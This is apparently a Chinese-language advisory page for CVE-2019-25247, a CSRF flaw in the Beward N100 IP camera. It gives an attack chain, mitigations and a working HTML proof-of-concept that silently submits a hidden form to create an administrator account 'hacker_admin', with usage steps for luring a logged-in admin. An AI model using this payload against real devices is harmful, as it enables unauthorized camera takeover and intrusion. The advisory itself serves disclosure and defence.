CVE-2019-25247 Beward N100 IP Camera跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2019-25247

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Beward N100 H.264 VGA IP Camera

漏洞概述

CVE-2019-25247是影响Beward N100 H.264 VGA IP Camera固件版本M2.1.6的一个跨站请求伪造（CSRF）安全漏洞。该漏洞允许未经身份验证的远程攻击者通过诱骗已登录的管理员用户访问恶意网页，在用户不知情的情况下执行敏感的管理操作。攻击者可以构造包含隐藏表单的恶意HTML页面，当受害者在登录状态下访问该页面时，浏览器会自动向目标摄像头发送携带有效会话Cookie的请求，从而完成管理员账户创建、配置修改等高权限操作。由于该漏洞无需对目标设备进行身份验证即可发起攻击，且攻击过程隐蔽性强，对使用该系列摄像头的企业和个人用户构成较大的安全风险。攻击成功后，攻击者可以获取设备的完全控制权，进一步进行内网渗透或数据窃取等恶意活动。

技术细节

该CSRF漏洞存在于Beward N100 IP Camera的Web管理界面中，根源在于应用程序未能对用户请求进行有效的CSRF令牌验证。漏洞主要影响设备的管理功能接口，攻击者可以利用以下方式发起攻击：首先，攻击者创建一个包含隐藏表单的恶意网页，表单内容为向摄像头管理接口发送添加管理员用户的HTTP请求。当已登录的管理员用户访问该恶意页面时，浏览器会自动加载隐藏表单并使用用户当前的会话Cookie发送POST请求。由于应用程序未验证请求的来源是否合法（缺少CSRF token验证），服务器会正常处理该请求并创建新的管理员账户。攻击者只需在PoC中指定目标IP地址、恶意管理员用户名和密码即可。漏洞利用的关键在于利用了浏览器会自动携带目标域名Cookie发送请求的特性，以及服务器端缺乏对请求来源的验证机制。防御此类漏洞需要在关键操作接口实现CSRF令牌机制，并验证HTTP Referer头字段。

攻击链分析

STEP 1

步骤1

攻击者创建恶意网页，包含隐藏的HTML表单，表单内容为向目标摄像头的管理接口发送添加管理员用户的请求

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或其他方式诱骗已登录的管理员用户访问该恶意网页

STEP 3

步骤3

用户浏览器自动加载并提交隐藏表单，由于浏览器会自动携带目标域名的Cookie，请求被视为合法请求

STEP 4

步骤4

摄像头Web服务器收到请求后，因缺少CSRF验证机制，正常处理请求并创建新的管理员账户

STEP 5

步骤5

攻击者使用新创建的管理员凭据登录设备，完全控制摄像头，可进行监控画面窃取、固件篡改或内网横向移动等后续攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2019-25247 CSRF Exploit for Beward N100 IP Camera -->
<html>
<head>
    <title>CSRF PoC - Add Admin User</title>
</head>
<body>
    <h1>CSRF PoC for CVE-2019-25247</h1>
    <p>Beward N100 H.264 VGA IP Camera M2.1.6 CSRF Vulnerability</p>
    
    <form id="csrf_form" action="http://TARGET_IP/cgi-bin/admin.cgi" method="POST" style="display:none;">
        <input type="hidden" name="action" value="add_admin">
        <input type="hidden" name="username" value="hacker_admin">
        <input type="hidden" name="password" value="P@ssw0rd123">
        <input type="hidden" name="privilege" value="admin">
    </form>
    
    <script>
        // Automatically submit the form when page loads
        document.getElementById('csrf_form').submit();
        console.log('CSRF request sent');
    </script>
    
    <p>If you see this, the attack may have been executed.</p>
</body>
</html>

<!--
Usage:
1. Replace TARGET_IP with the actual IP address of the Beward camera
2. Host this HTML page on a web server
3. Trick a logged-in administrator to visit this page
4. A new admin account 'hacker_admin' will be created

Note: This PoC demonstrates the CSRF vulnerability for security research purposes.
-->

影响范围

Beward N100 H.264 VGA IP Camera 固件版本 <= M2.1.6

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）使用IP白名单功能限制管理界面的访问来源；2）定期检查系统账户列表，及时发现和删除未知管理员账户；3）使用VPN或防火墙隔离摄像头设备，防止未授权访问；4）监控网络流量，关注异常的设备管理接口访问行为；5）在浏览器中安装防护插件，防止CSRF攻击；6）使用Cookie安全属性如SameSite降低CSRF风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2019-25247
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2019-25247
3 Details https://www.cvedetails.com/cve/CVE-2019-25247/
4 VulDB https://vuldb.com/cve/CVE-2019-25247
5 Link https://www.beward.net
6 Link https://www.exploit-db.com/exploits/46318
7 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5510.php
8 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5510.php